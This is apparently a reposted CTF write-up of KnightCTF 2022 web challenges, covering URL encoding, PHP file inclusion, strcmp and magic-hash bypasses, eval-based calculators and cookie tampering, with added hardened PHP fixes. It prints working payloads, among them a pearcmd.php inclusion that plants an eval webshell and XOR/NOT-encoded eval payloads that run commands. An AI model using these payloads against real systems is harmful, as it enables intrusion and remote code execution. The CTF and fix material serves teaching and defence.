
KnightCTF WEB

2022-02-09 15:03:22  Views: 183  Source: Internet

Tags: WEB code echo FLAG KCTF KnightCTF pass POST


Preface

Not hard, just a lot of fuzzing and guesswork.

Do Something Special

Clicking the button sends the browser to /gr@b_y#ur_fl@g_h3r3!#, which is obviously wrong: the unencoded # starts a URL fragment and never reaches the server. URL-encoding it as %23 and requesting that path shows the flag.

FLAG: KCTF{Sp3cial_characters_need_t0_get_Url_enc0ded}

My PHP Site


File inclusion. The source can be read through a php:// stream wrapper, or pearcmd.php can be included directly to get a shell.

Payload:

/?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?eval($_POST[0]);?>+-s+

Then include the written file to execute commands.


FLAG: KCTF{L0C4L_F1L3_1ncLu710n}
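The page loader below is an added example written for this writeup, not the challenge's own code. The challenge included whatever ?file= named, which is why both the php:// wrapper and pearcmd.php were reachable; here the parameter is only ever a key into a fixed map, so the include target never derives from user input. The PAGES directory layout and page names are assumptions, and the code assumes PHP 8 (for the mixed type).

```php
<?php
declare(strict_types=1);

// Added example (not the challenge's code): an allowlisted page loader.
// The vulnerable pattern this replaces is, in effect,  include $_GET['file'];
// Page names and paths below are assumptions for illustration.

const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

/** Resolve a requested page name to a file path, or null if it is not allowlisted. */
function resolvePage(mixed $name): ?string
{
    // Arrays, null and anything else that is not a plain string are rejected
    // before the lookup. Exact-key matching means "../", "php://", absolute
    // paths and query-string tricks can never become part of the result.
    if (!is_string($name) || !array_key_exists($name, PAGES)) {
        return null;
    }
    return PAGES[$name];
}

$target = resolvePage($_GET['file'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
require $target;
```

Two configuration points complement the code: allow_url_include should stay Off so remote wrappers are not an option even if a raw include slips in elsewhere, and the pearcmd.php route depends on register_argc_argv being enabled and PEAR being present in the image, so disabling the former and dropping PEAR from the production image closes that vector independently of the application code.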

Obsfuscation Isn’t Enough

Inspecting the HTML reveals JSFuck.
Decoding it yields 150484514b6eeb1d99da836d95f6671d.php

Requesting the PHP file directly returns the flag.
FLAG: KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}

Zero is not the limit

Hint: /user/
At first it returns a pile of JSON.


Each user has an entry under /user/; requesting /user/-1 returns the flag.

FLAG: KCTF{tHeRe_1s_n0_l1m1t}

Find Pass Code – 1

A comment in the page reads:
Hi Serafin, I learned something new today.
I build this website for you to verify our KnightCTF 2022 pass code. You can view the source code by sending the source param

Requesting url/?source returns the source code:

<?php
require "flag.php";
if (isset($_POST["pass_code"])) {
    if (strcmp($_POST["pass_code"], $flag) == 0) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}
?>

Array bypass: POST pass_code[]=1. With an array argument strcmp() returns NULL (with a warning) on PHP 7, and NULL == 0 is true.

FLAG: KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}

Most Secure Calculator-1

Source:

<?php
if (isset($_POST["equation"]) && !is_array($_POST["equation"])) {
    if (empty($_POST["equation"])) {
        echo "Please enter some eqation.";
    } else {
        if (strlen($_POST["equation"]) >= 25) {
            echo "Oow ! You have entered an equation that is too big for me.";
        } else {
            echo "<h1> Result : <br>";
            eval("echo " . $_POST["equation"] . ";");
            echo "</h1>";
        }
    }
}
?>

The input goes straight into eval().
FLAG: KCTF{WaS_mY_cAlCuLaToR_sAfE}

Find Pass Code - 2

  • magic hashes
  • md5
<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
    foreach ($old_pass_codes as $old_pass_code) {
        if ($_POST["pass_code"] === $old_pass_code) {
            $old_pass_flag = true;
            break;
        }
    }
    if ($old_pass_flag) {
        echo "Sorry ! It's an old pass code.";
    } else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}
?>

Brute-forcing is out of the question; I collected magic hashes and picked one at random.
Magic hashes (input : MD5):

0e215962017:0e291242476940776845150308577824
0e730083352:0e870635875304277170259950255928
0e807097110:0e318093639164485566453180786895
0e840922711:00e64922204642369621338070008986
0e1137126905:0e291659922323405260514745084877
0e1284838308:0e708279691820928818722257405159
0e2799298535:0e258310720843549656960157258725
0e3335999050:0e130023719718288785799459522477
0e3519466817:0e094940930906507337180165634011

FLAG:KCTF{ShOuD_wE_cOmPaRe_MD5_LiKe_ThAt__Be_SmArT}
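The following is an added example, not the challenge's code, covering both pass-code challenges in this writeup. It shows why strcmp(...) == 0 and $x == md5($x) are bypassable and replaces both with a single type-safe, constant-time comparison. The $flag source is a placeholder for the value the challenge loaded from flag.php, and the code assumes PHP 8 for the mixed type.

```php
<?php
declare(strict_types=1);

// Added example (not the challenge's code). $flag is a placeholder: the real
// challenge loaded it from flag.php.
$flag = getenv('KCTF_FLAG') ?: 'KCTF{placeholder}';

// Find Pass Code - 1:  strcmp($_POST["pass_code"], $flag) == 0
//   On PHP 7 an array argument makes strcmp() return NULL (with a warning), and
//   NULL == 0 is true, which is why pass_code[]=1 was accepted. PHP 8 throws a
//   TypeError for the array, but the loose == remains the underlying mistake.
//
// Find Pass Code - 2:  $_POST["pass_code"] == md5($_POST["pass_code"])
//   "0e215962017" and its MD5 "0e291242476940776845150308577824" are both
//   numeric strings in scientific notation that evaluate to 0, so == compares
//   0 with 0 and succeeds. This holds on PHP 7 and PHP 8.
function looseMd5Check(string $candidate): bool
{
    return $candidate == md5($candidate);
}

/** Hardened check: the candidate must be a string and must match byte for byte. */
function hardenedCheck(mixed $candidate, string $expected): bool
{
    if (!is_string($candidate)) {
        return false;
    }
    // hash_equals() never converts types or reads strings as numbers, and its
    // running time does not depend on how long the matching prefix is.
    return hash_equals($expected, $candidate);
}

if (isset($_POST['pass_code'])) {
    if (hardenedCheck($_POST['pass_code'], $flag)) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo 'Wrong pass code.';
    }
}
```

Calling looseMd5Check('0e215962017') reproduces the accepted magic hash from the list above, while hardenedCheck('0e215962017', md5('0e215962017')) is false because the two strings differ byte for byte; hardenedCheck(['1'], $flag) is false without any warning. Where the stored value is itself a digest rather than the plaintext, compare digests with hash_equals() in the same way, never with == or strcmp().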

Bypass!! Bypass!! Bypass!!

A comment reveals:

<!-- generats auth token -> /api/request/auth_token -->

Attempts to bypass the 403 failed.

/api/request/auth_token    Allow: POST, OPTIONS
/      Allow: GET, HEAD, OPTIONS

A GitHub search turned up the source: bug-bounty-labs

Add the header
X-Authorized-For: the token obtained from the endpoint

FLAG:KCTF{cOngRatUlaT10Ns_wElCoMe_t0_y0ur_daShBoaRd}

Most Secure Calculator -2

Only letters and digits are allowed, so bypass with XOR or bitwise NOT; fuzz a little to construct the command.

Payloads:

(~%8C%86%8C%8B%9A%92)(~%D7%DD%8F%88%9B%DD%D6%C4)
("393480"^"@@@@]]")(("8!4@80!8"^"[@@`^@_").(".").("484"^"@@@"))
"\163\171\163\164\145\155"("\143\141\164\40\146\154\141\147\56\164\170\164")

FLAG: KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}
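As an added example (not the challenge's code) that serves both calculator challenges: the root cause in each is that the request string reaches eval(), and Calculator-2's character filter only changes the encoding the writeup has to use (XOR, bitwise NOT, octal escapes). The parser below turns the equation into numbers and operators and never produces PHP code, so there is no filter to bypass. It supports + - * /, unary minus, decimals and parentheses; the error messages and the retained 25-character limit are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not the challenge's code): an arithmetic evaluator that
// replaces eval(). Grammar:  expression := term (('+'|'-') term)*
//                            term       := factor (('*'|'/') factor)*
//                            factor     := number | '-' factor | '(' expression ')'
final class SafeCalculator
{
    /** @var string[] */
    private array $tokens = [];
    private int $pos = 0;

    public function evaluate(string $expression): float
    {
        $stripped = (string) preg_replace('/\s+/', '', $expression);
        // Tokenize: numbers, the four operators and parentheses only.
        preg_match_all('/\d+(?:\.\d+)?|[-+*\/()]/', $stripped, $m);
        // Anything the tokenizer did not consume (letters, quotes, ~, ^, \, ...)
        // shows up as a mismatch here and the whole input is rejected.
        if ($stripped === '' || implode('', $m[0]) !== $stripped) {
            throw new InvalidArgumentException('equation contains unsupported characters');
        }
        $this->tokens = $m[0];
        $this->pos = 0;
        $value = $this->parseExpression();
        if ($this->pos !== count($this->tokens)) {
            throw new InvalidArgumentException('unexpected token ' . $this->tokens[$this->pos]);
        }
        return $value;
    }

    private function parseExpression(): float
    {
        $value = $this->parseTerm();
        while (($op = $this->peek()) === '+' || $op === '-') {
            $this->pos++;
            $rhs = $this->parseTerm();
            $value = $op === '+' ? $value + $rhs : $value - $rhs;
        }
        return $value;
    }

    private function parseTerm(): float
    {
        $value = $this->parseFactor();
        while (($op = $this->peek()) === '*' || $op === '/') {
            $this->pos++;
            $rhs = $this->parseFactor();
            if ($op === '/') {
                if ($rhs == 0.0) {
                    throw new InvalidArgumentException('division by zero');
                }
                $value /= $rhs;
            } else {
                $value *= $rhs;
            }
        }
        return $value;
    }

    private function parseFactor(): float
    {
        $tok = $this->peek();
        if ($tok === null) {
            throw new InvalidArgumentException('unexpected end of equation');
        }
        $this->pos++;
        if ($tok === '-') {
            return -$this->parseFactor();
        }
        if ($tok === '(') {
            $value = $this->parseExpression();
            if ($this->peek() !== ')') {
                throw new InvalidArgumentException('missing closing parenthesis');
            }
            $this->pos++;
            return $value;
        }
        if (is_numeric($tok)) {
            return (float) $tok;
        }
        throw new InvalidArgumentException("unexpected token $tok");
    }

    private function peek(): ?string
    {
        return $this->tokens[$this->pos] ?? null;
    }
}

// Request handling as in the challenge, with eval() replaced by the parser.
if (isset($_POST['equation']) && is_string($_POST['equation'])) {
    if (strlen($_POST['equation']) >= 25) {
        echo 'Equation too long.';
    } else {
        try {
            $result = (new SafeCalculator())->evaluate($_POST['equation']);
            echo '<h1> Result : <br>' . htmlspecialchars((string) $result, ENT_QUOTES) . '</h1>';
        } catch (InvalidArgumentException $e) {
            http_response_code(400);
            echo htmlspecialchars($e->getMessage(), ENT_QUOTES);
        }
    }
}
```

The consumed-tokens check in evaluate() is what makes the allowlist strict: a byte the tokenizer skips (a quote, a backslash, ~ or ^) leaves the concatenated tokens shorter than the input, so all three payloads above are rejected before any parsing starts rather than being partially evaluated.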

Can you be Admin?

User-Agent: KnightSquad
then
Referer: localhost

The JSFuck reveals Unicode escapes; decoding them (bt.cn Unicode decoder) gives:

F`V,7DIIBn+?CWe@<,q!$?0EpF*DPCA0<oU8RZI/DJ<`sF8

Then ASCII85-decode it (ASCII85 decoder):

username: tareq, password: IamKnight

After logging in you are an ordinary user, and the response sets a cookie with a strange field. Base64-decode it, change the value to Admin, and resend the request: the flag appears.

FLAG: KCTF{FiN4LlY_y0u_ar3_4dm1N}
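The challenge trusted a role stored in a client-held base64 cookie, which is why rewriting the field to Admin worked. The added example below (not the challenge's code) keeps the role in a cookie but binds it to a server secret with an HMAC and verifies the tag before any field is trusted. The cookie name, key source, one-hour lifetime and the demo username are assumptions; it assumes PHP 8.

```php
<?php
declare(strict_types=1);

// Added example (not the challenge's code): an HMAC-signed role cookie.
// Cookie name, key source and lifetime are assumptions for illustration.
const ROLE_COOKIE = 'session';

/** Build "base64(json).hmac" for a freshly authenticated user. */
function issueRoleCookie(string $username, string $role, string $key): string
{
    $payload = base64_encode(json_encode([
        'user' => $username,
        'role' => $role,
        'exp'  => time() + 3600,
    ], JSON_THROW_ON_ERROR));
    // '.' is not in the base64 alphabet or the hex tag, so it is a safe separator.
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

/** Verify and decode the cookie; null means "treat as not logged in". */
function readRoleCookie(mixed $cookie, string $key): ?array
{
    if (!is_string($cookie) || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$payload, $tag] = explode('.', $cookie, 2);
    // Check the tag before decoding anything: an edited payload, or a tag made
    // with a different key, fails here in constant time.
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $tag)) {
        return null;
    }
    $raw  = base64_decode($payload, true);
    $data = $raw === false ? null : json_decode($raw, true);
    if (!is_array($data) || !isset($data['user'], $data['role'], $data['exp'])) {
        return null;
    }
    return $data['exp'] >= time() ? $data : null;
}

/** Self-check: the base64 rewrite described in the writeup fails verification. */
function forgedCookieIsRejected(string $key): bool
{
    $cookie = issueRoleCookie('tareq', 'User', $key);   // demo user from the writeup
    [$payload, $tag] = explode('.', $cookie, 2);
    $edited = str_replace('"User"', '"Admin"', (string) base64_decode($payload, true));
    $forged = base64_encode($edited) . '.' . $tag;
    $genuine = readRoleCookie($cookie, $key);
    return $genuine !== null && $genuine['role'] === 'User'
        && readRoleCookie($forged, $key) === null;
}

if (PHP_SAPI === 'cli') {
    exit(forgedCookieIsRejected('demo-key') ? 0 : 1);
}

// Request handling for an admin-only page.
$key = getenv('SESSION_HMAC_KEY') ?: 'placeholder-replace-with-a-random-key';
$session = readRoleCookie($_COOKIE[ROLE_COOKIE] ?? null, $key);
if ($session === null || $session['role'] !== 'Admin') {
    http_response_code(403);
    exit('Forbidden');
}
echo 'Welcome to the admin dashboard, ' . htmlspecialchars((string) $session['user'], ENT_QUOTES);
```

The simpler default is a server-side session ($_SESSION keyed by an opaque id, with the role looked up from the user store on each request), since then no role data leaves the server at all; the signed-cookie form is for the stateless case. Either way the cookie should be set with the Secure, HttpOnly and SameSite attributes, and the signing key must be a random value from configuration, never the placeholder shown.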

Source: https://blog.csdn.net/qq_53263789/article/details/122642289
